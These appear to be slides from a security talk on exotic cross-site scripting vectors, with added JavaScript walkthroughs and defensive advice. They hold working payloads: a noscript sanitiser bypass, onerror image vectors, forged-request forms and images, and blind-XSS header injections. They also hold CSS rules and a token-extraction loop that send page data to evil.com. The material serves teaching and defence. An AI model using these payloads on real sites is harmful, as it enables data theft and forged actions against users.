XXSS

EXOTIC CROSS-SITE SCRIPTING VECTORS

@BenedekGagyi

So... what's up with security?


Just enjoy the show and try to learn from it...


You don't have to be an expert to be able to enjoy something.

@samykamkar

"but most of all, Samy is my hero" (the payload of Samy's 2005 MySpace worm, the stored XSS worm everyone learns from)

ATTACK FLOW (stored XSS)

Malicious script
  → stored on the site (comment, profile field, message)
  → site serves the page containing the malicious script to every visitor


Types of XSS (so far)

  • Stored (non-DOM based)
  • ?
  • ?
  • ?


Reflected XSS

https://www.mybank.com?name=<script>alert(1)</script>

The script lives only in the URL: the server echoes the name parameter into its response, so the victim has to be made to open the link.


ATTACK FLOW (reflected XSS)

URL containing malicious script
  → request made using the malicious URL
  → site reflects the script back, and the response now contains the malicious script


Types of XSS (so far)

  • Stored (non-DOM based)
  • Reflected (non-DOM based)
  • ?
  • ?


Types of XSS

  • Non-DOM-based (server rendered: the server writes the script into the HTML)
      • Stored
      • Reflected
  • DOM-based (browser rendered: client-side script writes attacker data into the DOM)


User inputs

Where should we sanitise input?


browsers are ... weird

Input:

<div><script title="</div>">

Resulting tree:

<div>
  <script title="</div>">
  </script>
</div>

Inside a start tag the quoted "</div>" is just an attribute value, and <script> content is raw text, so the </div> never closes anything: the parser closes both elements itself at end of input.


browsers are ... weird

Input:

<script><div title="</script>"

Resulting tree:

<script>
  <div title="
</script>
"

The other way round: <script> content is raw text, so no <div> is ever created, and the first </script> ends the element wherever it appears, even in the middle of what looks like an attribute value. The stray " becomes a text node.


mutation XSS (mXSS)

Markup that a sanitiser judged harmless is mutated by the browser's own parsing and serialisation into markup that executes.

defending against mXSS: parse the string and interpret it as two separate steps

const div = document.createElement("div");
// A regular element does both at once: setting innerHTML parses the string
// AND interprets the result. The parser repairs the unclosed <img>, the
// browser fetches src, and onerror fires, even though div is not in the
// document.
div.innerHTML =
  "<img src=x onerror=alert(1)";


"[..] is a mechanism for holding HTML that is not to be rendered immediately when a page is loaded but may be instantiated subsequently" (MDN, on the <template> element)


defending against mXSS

var template = document.createElement("template");
// template.content is an inert DocumentFragment: the markup is parsed, but
// nothing in it is interpreted (no script runs, no image is fetched), so the
// tree can be inspected and cleaned before it goes anywhere near the page.
template.innerHTML =
  "<img src=x onerror=alert(1)";
template.content.children[0]
  .removeAttribute('onError');

Caveat: the fragment is inert, but the cleaned tree still has to be serialised and parsed a second time to end up in the live document, and that second parse can behave differently from the first. That gap is exactly what the Google search case that follows exploits.


Google search vulnerability

A sanitiser that parses with scripting disabled (DOMParser, <template>) and a page that renders with scripting enabled disagree about one element: with scripting enabled, <noscript> content is raw text; with scripting disabled, it is parsed as ordinary HTML. The payload:

<noscript>
  <p title="
    </noscript>
    <img src=x onerror=alert(1)>
  ">


Google search vulnerability: what the sanitiser sees (scripting disabled)

The <noscript> content is parsed as normal HTML, so the whole </noscript><img ...> sequence is just the title attribute of the <p>. There is nothing to remove:

<noscript>
  <p title="
    </noscript>
    <img src=x onerror=alert(1)>
  ">
  </p>
</noscript>


Google search vulnerability: what the browser sees (scripting enabled)

The <noscript> content is raw text, so the </noscript> inside the attribute value ends the element, and the <img> after it becomes a real element with a live onerror handler. The leftover "> is plain text, and the stray </p> makes the parser insert an empty paragraph:

<noscript>
  <p title="
</noscript>
<img src=x onerror=alert(1)>
">
<p></p>
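To make the two parser views concrete, here is an added example (not code from the talk): a cut-down HTML tokenizer that models the single behaviour the "browsers are ... weird" slides and the <noscript> case depend on. Some elements switch the tokenizer into raw-text mode, where nothing is a tag until the matching end tag, and <noscript> is one of them only when scripting is enabled. The function names, the scripting option and the copied payload string are this example's own; the tokenizer handles only the element and attribute syntax needed here, not the full HTML5 algorithm.

```javascript
// Elements whose content is always raw text (no tags are recognised inside).
const RAWTEXT = new Set(['script', 'style', 'textarea', 'title', 'xmp', 'iframe', 'noembed', 'noframes']);

// <noscript> is raw text only when the parser believes scripting is on.
function isRawText(name, scripting) {
  return RAWTEXT.has(name) || (name === 'noscript' && scripting);
}

// Returns a flat token list:
//   {type:'start', name, attrs} | {type:'end', name} | {type:'text', data}
function tokenize(html, { scripting = true } = {}) {
  const tokens = [];
  const n = html.length;
  let i = 0;
  while (i < n) {
    if (html[i] !== '<') {                    // plain text up to the next '<'
      let j = html.indexOf('<', i);
      if (j === -1) j = n;
      tokens.push({ type: 'text', data: html.slice(i, j) });
      i = j;
      continue;
    }
    let m = /^<\/([a-zA-Z][^\s\/>]*)[^>]*>/.exec(html.slice(i));
    if (m) {                                  // end tag
      tokens.push({ type: 'end', name: m[1].toLowerCase() });
      i += m[0].length;
      continue;
    }
    m = /^<([a-zA-Z][^\s\/>]*)/.exec(html.slice(i));
    if (!m) {                                 // a lone '<' is just text
      tokens.push({ type: 'text', data: '<' });
      i += 1;
      continue;
    }
    const name = m[1].toLowerCase();
    i += m[0].length;
    const attrs = {};
    while (i < n) {                           // attributes until '>' or end of input
      const rest = html.slice(i);
      let a;
      if ((a = /^\s*\/?>/.exec(rest))) { i += a[0].length; break; }
      if ((a = /^\s*([^\s=\/>]+)\s*=\s*"([^"]*)"/.exec(rest)) ||   // name="value"
          (a = /^\s*([^\s=\/>]+)\s*=\s*'([^']*)'/.exec(rest)) ||   // name='value'
          (a = /^\s*([^\s=\/>]+)\s*=\s*([^\s>]+)/.exec(rest)) ||   // name=value
          (a = /^\s*([^\s=\/>]+)/.exec(rest))) {                   // bare name
        attrs[a[1].toLowerCase()] = a[2] === undefined ? '' : a[2];
        i += a[0].length;
      } else {
        i += 1;                               // stray character, skip it
      }
    }
    tokens.push({ type: 'start', name, attrs });
    if (isRawText(name, scripting)) {         // swallow everything up to </name
      const close = new RegExp('</' + name + '(?=[\\s/>]|$)', 'ig');
      close.lastIndex = i;
      const c = close.exec(html);
      const end = c ? c.index : n;
      if (end > i) tokens.push({ type: 'text', data: html.slice(i, end) });
      i = end;
    }
  }
  return tokens;
}

// The two questions a sanitiser actually asks of a string.
function startTags(html, opts) {
  return tokenize(html, opts).filter((t) => t.type === 'start').map((t) => t.name);
}
function hasEventHandler(html, opts) {
  return tokenize(html, opts).some((t) => t.type === 'start' &&
    Object.keys(t.attrs).some((k) => k.startsWith('on')));
}

// Constructed copy of the slide's payload, on one line.
const NOSCRIPT_PAYLOAD = '<noscript><p title="</noscript><img src=x onerror=alert(1)>"></p></noscript>';

// Sanitiser view (scripting off): noscript, p; no handler anywhere.
// Browser view (scripting on):    noscript, img; onerror is live.
```

startTags(NOSCRIPT_PAYLOAD, { scripting: false }) yields noscript and p, while startTags(NOSCRIPT_PAYLOAD, { scripting: true }) yields noscript and img: same bytes, different elements. The same tokenizer reproduces the two <script> slides, since <script> is raw text in both modes. The lesson for a sanitiser is that it must parse in the same mode as the document it will be serialised into, or, better, avoid the serialise-and-reparse round trip altogether.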


What if I can't inject a script, or JavaScript is turned off completely?

CSS injection

Every URL in injected CSS is a request the victim's browser makes for you:

background-image:
  url(https://www.evil-site.com/track)

  • PII - Personally Identifiable Information, straight from that request
    • IP address
    • OS
    • Browser (both from the User-Agent header)


CSS injection

  • User behaviour tracking: a selector that only matches in a given state turns the request into a one-bit report

.two-factor-checkbox:checked {
  background-image:
    url(https://www.evil.com/track?no2fa=true);
}

.security-tips-link:visited {
  background-image:
    url(https://www.evil.com/track?uneducated=true);
}

Caveat: browsers have restricted :visited for years precisely because of this leak (only colour properties apply, and getComputedStyle reports the unvisited style), so the :visited rule does not fire a request in a current browser; the :checked one does.


CSS injection

  • Data scraping
  • Key logging

Attribute selectors test attribute values, so one rule per candidate value (or per prefix, with [value^="..."]) leaks what an element holds:

.meeting-location[value="Iulius Mall"] {
  background-image:
    url(https://www.evil.com/track?loc=IuliusMall);
}

Caveat: this matches the value attribute, not the live value property. It works for values the server rendered into the page (hidden tokens, prefilled fields) and for frameworks that mirror typed input back into the attribute, which is what makes the key-logging variant possible.
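The prefix variant of the scraping rule above, carried through to a full read of a value, as an added example that is not from the talk. The generator builds one rule per candidate next character; the "browser" is simulated by a function that picks the rule whose prefix matches the element's value attribute and returns the beacon URL it would request. The hex alphabet, the collector URL, the csrf selector and all function names are this example's assumptions.

```javascript
const HEX = '0123456789abcdef';               // assumed alphabet of the secret
const BEACON = 'https://www.evil.com/track';  // assumed attacker-controlled collector

// One rule per candidate next character. Only the rule whose prefix matches the
// input's value attribute makes the browser fetch its background-image, and the
// query string of that fetch tells the attacker which character it was.
function buildExfilRules(selector, knownPrefix, alphabet = HEX, beacon = BEACON) {
  return alphabet.split('').map((ch) => {
    const prefix = knownPrefix + ch;
    return `${selector}[value^="${prefix}"] { background-image: url("${beacon}?v=${encodeURIComponent(prefix)}"); }`;
  }).join('\n');
}

// Stand-in for the browser: given the element's real value attribute, return
// the beacon URL the matching rule would request, or null if none matches.
function matchingBeacon(css, actualValue) {
  const rule = /\[value\^="([^"]*)"\][^{]*\{\s*background-image:\s*url\("([^"]*)"\);/g;
  let m;
  while ((m = rule.exec(css)) !== null) {
    if (actualValue.startsWith(m[1])) return m[2];
  }
  return null;
}

// Attacker loop: inject a stylesheet built from what is known so far, read the
// beacon, extend the prefix, repeat until no rule fires.
function extractValue(selector, actualValue, alphabet = HEX) {
  let known = '';
  for (;;) {
    const hit = matchingBeacon(buildExfilRules(selector, known, alphabet), actualValue);
    if (hit === null) return known;          // finished, or next char is outside the alphabet
    known = new URL(hit).searchParams.get('v');
  }
}

// Constructed target: a CSRF token the server rendered as value="…" on a hidden input.
const CSRF_SELECTOR = 'input[name="csrf"]';
```

extractValue(CSRF_SELECTOR, 'a3f9') reads the whole token in four rounds of sixteen rules each; a character outside the alphabet ends the read early with whatever prefix was recovered. In a real attack each round is a new injection (or a new @import), so the technique needs repeated injections or an injection point that reloads, which is the practical limit of the method.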


on-site request forgery
(OSRF)

No script at all: a link injected into the page points at a state-changing URL on the same site, so when the victim clicks it the request is same-origin and carries their cookies.

Malicious link:

<a
  href="
    /sendMoney?
    amount=100&
    to=123
  "
>
</a>


Html injection

<form
  action="
    /sendMoney?
    amount=100&
    to=123
  "
>
  <button>Click me for free pizza</button>
</form>

Because the request is same-origin, SameSite cookies and Origin/Referer checks do nothing here; only a per-request anti-CSRF token, which the injected form cannot contain, stops it.


Html injection

Beware of
images

Image Injection


An injected image with a handler is plain XSS:

<img
  src="invalid.address"
  onerror="alert(':P')"
/>

OSRF

this time with an image!

The browser fetches src on its own, with the victim's cookies, as soon as the image is parsed: no click, no script.

<img src="https://bank.com/
    send_money?
    amount=9999&
    to=1231234143"
/>


But I have CSP set!

CSP only decides which hosts an image may be fetched from. A tracking-pixel host that img-src already allows is all an injected image needs to carry data out in its query string:

<img
  src="https://www.facebook.com/
    tr?
    id=1234567890&
    ev=PageView"
/>


What do you consider user input?


blind XSS

The payload is not reflected where you put it. It fires later, in some back-office page that renders the stored request (a log viewer, a support console), and you never see it happen:

True-Client-IP: <script>alert(":P")</script>
User-Agent: <script>alert(":P")</script>

blind XSS

Non-user facing
!==
non-attackable
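An added example, not from the talk, of the mistake behind blind XSS and its fix: an internal "recent requests" page that renders request headers. The vulnerable renderer interpolates header values straight into the markup because "only staff see this page"; the hardened one escapes for the HTML text and double-quoted attribute contexts it writes into. The log entry, the header names used and the function names are constructed for the example.

```javascript
// Constructed log entry: header values are attacker-controlled, the page is
// only ever seen by staff, and that is exactly why it gets no escaping.
const ENTRY = {
  ip: '203.0.113.7',
  userAgent: '<script>alert(":P")</script>',
  trueClientIp: '" onmouseover="alert(1)',   // breaks out of the title attribute
};

// Vulnerable: header values dropped straight into the markup.
function renderRowVulnerable(e) {
  return `<tr><td title="${e.trueClientIp}">${e.ip}</td><td>${e.userAgent}</td></tr>`;
}

// Hardened: escape the five characters that matter in HTML text and in
// double-quoted attribute values.
const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

function renderRowSafe(e) {
  return `<tr><td title="${escapeHtml(e.trueClientIp)}">${escapeHtml(e.ip)}</td>` +
         `<td>${escapeHtml(e.userAgent)}</td></tr>`;
}

// Check used for the comparison: does the rendered row still have exactly the
// shape of the template, i.e. no tag or attribute the data smuggled in?
function injectedMarkup(html) {
  const shape = /<tr><td title="[^"]*">[^<]*<\/td><td>[^<]*<\/td><\/tr>/;
  return !shape.test(html);
}
```

renderRowVulnerable(ENTRY) produces a live <script> element and a second attribute on the cell; renderRowSafe(ENTRY) produces the same row with &lt;script&gt; and &quot; in the text, which the browser shows literally. This is what "use the framework" in the TL;DR buys you: a templating engine with auto-escaping does the escapeHtml step on every interpolation, including the ones in admin pages nobody threat-modelled.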


TL;DR.

  • Validate & sanitise input, on the server, in the context it will be rendered in

  • beware of images: an injected <img> makes requests with the victim's cookies, and CSP does not stop it

  • don't try to be smart: don't write your own sanitiser or HTML parser

  • Use the framework and its auto-escaping templates

  • update third-party components regularly

Stay safe, and don't forget to have fun.

Thank you!